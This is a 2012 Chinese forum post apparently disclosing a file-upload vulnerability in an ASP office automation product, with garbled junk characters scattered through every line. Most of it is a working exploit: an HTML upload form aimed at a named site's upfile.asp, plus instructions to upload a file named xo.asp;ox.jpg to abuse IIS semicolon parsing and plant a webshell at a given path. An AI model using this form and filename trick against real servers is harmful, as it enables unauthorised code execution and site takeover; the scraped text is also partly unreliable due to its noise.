全能OA办公系统 上传漏洞1 x- Z: W; b1 H& A& g
9 M. d! U3 Q$ C s3 L系统介绍:
6 l7 U/ z3 W3 m" ?3 |* c/ s
M; {" N9 j3 m/ ]全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
# ~0 ?! c( ? k4 [7 K$ x0 G& y' i& H' H* B: e M# G
主要功能:8 t2 R. U) W5 }2 F. h
公司通告
7 M9 b* g) y% S. ^+ D工作计划 7 k! F: S+ M7 p7 @! {+ w
通讯助理 6 t1 e: p* {; x' D0 b
客户资源 + U* h7 a; _3 h. }" t" \
我的公文 8 d( J. n$ z2 u) O" J
公文传阅
' }: u. x- [+ C$ Y公共资源
/ v! }/ r. [9 w( \1 u3 M资源预约 $ T# t" q0 z7 G- R, t
今日考勤
2 W0 d% C* R, ? z个人计划
* q% S I [) G个人通讯录 6 G2 |+ K9 _- U( _
个人基本档案 : h3 r, U8 y2 W6 ~: h
未读邮件
# {, H, n }9 G2 z发邮件 # X$ P& F& J) y/ ^8 ` H
收件夹 7 j" |) M* V% X/ ~8 a
寄件夹 3 a, I/ Z7 W+ n
网络硬盘 ' \7 s+ [( I2 t( q- c' M" C/ M
网络会议
! t. F3 h0 ?# N: m% a$ J5 `& \网络调查 6 A' ^; d. j W, z: K8 X( ^
交流论坛
7 A7 e8 P1 J: g) m5 G; t# ~! B
# M* s: W' P5 Z7 V, C! S9 K( i有兴趣测试的朋友可以下源码看看5 [! y& m# R) I6 l- e
% c( y- v: l5 V& T6 @- v4 Y6 p' t源码下载:" ^6 C. ~# o7 @0 A( G0 {
& B7 m* a4 E( W9 nhttp://www.mycodes.net/30/4750.htm- x3 P5 N/ Q" B/ t5 x# G9 G9 O
% f+ }3 k3 B; x; `' G2 U漏洞介绍:
/ p3 O t& h' h9 Q0 Q% I, B& U# t2 D% C; w( s& W
由upfile.asp上传文件漏洞引起
& |4 }' u+ |! {4 l+ S6 C; a1 \% s8 i& \1 C( |2 M
测试方法:
1 s6 Y5 C+ S7 b( @% p" y0 H. Q$ T0 H* L" c, ?; I) q; V
使用名小子上传http://www.itlynn.com/upfile.asp即可% I* N0 |6 s- @, y
4 o/ n& c% T5 n如果upfile.asp文件被删除不存在。
5 u# m7 d; A% C- q9 z
& z$ ]7 z' ]( g( f5 s7 I. C 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。& @% P" `) _ u ^/ A% M% X
8 `& z: W0 @- ~& w7 L' c' _ y
如果存在那么将如下代码保存为upfile.html。! _% t0 L9 q! x" X) A
" q; X, J$ E- B% |& k, d1 Z
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。" g5 \3 b* D( ~# B1 @& {
# U5 c+ {. r% W/ ~2 N , Y4 t! o6 o3 Q/ [' F& h& S* ~0 x" D# H
& T) \# u% P& B0 S3 v5 b01 <table border='0' align="center" cellpadding="5">
2 w$ V1 ~! r( l
+ v, _4 F4 l1 S8 [- ^7 T( M02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> " |# j h/ d( _6 |
) |* X' s6 J$ c/ n# ^( m8 Z- M. Z
03 <tr>
( E6 [4 B4 z8 s ^$ a. ^- g" G! t, l" K. k/ ^/ K
04 <td>报错:</td> ) l0 v5 O4 u2 J( O0 V$ X
1 z( A; r; J+ \$ w2 o5 i- h' E
05 <td><input type='radio' name='errnumber' value='0'>
1 d4 r" c' ~6 q& v& @
6 m2 K% U4 Q! w5 |9 u% Q! S2 x06 自动更名
( [7 ], P; e6 ^
: \+ k2 k% A& V& j2 _07 <input type='radio' name='errnumber' value='1' checked> : _# _/ Y, V6 ^" j
. [9 r7 ]$ c i2 f4 e) I8 T% `5 h08 报错方式
y! m `8 y+ A) L; D" [3 }2 e% g! y3 l
09 <input type='radio' name='errnumber' value='2'> ( g$ `6 Q" ^9 d* H1 N+ g
& r5 j2 e- V9 ~- u* z
10 直接覆盖</td>
# F- N. A( G. P( H* n- \4 c V8 J" D
11 </tr>
/ @# g+ T/ c: [- _+ F! f2 |+ p. p4 L! d& `2 B) f J7 v
12 <tr>
# ~: I7 P5 U; ^' t6 H
5 x) B- ^" u) k7 r$ ~13 <td>主题:</td>
8 M& O5 J' f( n0 Q+ {
3 t- E' |, ~. n6 m4 i5 _14 <td><input type='text' name='filename' size='30'></td>
9 @& g1 }4 Y, N# P- o! o4 O9 R0 M
5 Y, a! N9 ~6 [9 [+ G& z15 </tr> - g; H* V9 j9 A- M9 w
! \5 }0 C1 F" r1 j16 <tr> 0 k; K% R7 F% h4 R! w5 o. G
1 {4 G6 X& x& u9 M" a+ |( @8 s
17 <td>文件:</td> 8 `) j& E& X! k' J
' I6 T/ D& E6 y( T0 w3 T
18 <td><input type="file"name="fruit"size="30"></td> / `" |" e8 u/ M: _. O1 |* D' P' x
; a& N3 m% n7 K8 w/ c) D& ?6 @19 </tr> + Z: I* {) O L: V1 J; q
0 P- V, C! R, a; _' J: R8 e
20 <tr> 3 Q* v" E* v6 Q
2 ]4 H$ x' i' q* _! Z) V! J21 <td valign='top'>简介:</td> 2 J! F- I3 ]4 h* A4 U5 l8 m
3 ]# N; |5 B* G* ~
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
0 Z' _* }& T8 d3 `2 i# M& w, B" f/ n) z9 \+ f2 |
23 </tr> - T5 q F. s3 F8 I- K+ d9 b
+ ^2 f+ J; S1 c. x+ Z t24 # | |9 A& Z5 P) O
* A) ]( f2 w' z: c6 d% W
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> . Z$ l, U: N7 J8 y4 L
4 M' j8 f( P! [* f3 k: ?9 z7 ~
26 </tr> 8 X: j/ k9 N, D9 v: R7 M/ x
$ F$ ?4 y- Q: h: ~" X7 W
27 </form> / _9 B0 Q( v L/ o c- V
* \# L5 n$ A1 |) }# |然后打开上传一个文件名为xo.asp;ox.jpg的文件。
R) m) f+ o. z8 \1 k+ H2 p' q/ O9 @, R& w. s
# q+ D/ ?" w/ s- i7 }0 ^
% d4 ~1 W- b0 }
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* I9 ~4 X) x2 \$ H+ e& w% U: u8 B- `7 S3 Q- w$ s& ?; ?
此漏洞需要配合解析漏洞利用。/ F' e: E7 H: B5 p2 i
+ O$ C5 a; [ A1 H |
发表于 2012-11-21 13:45:12
收藏
支持
反对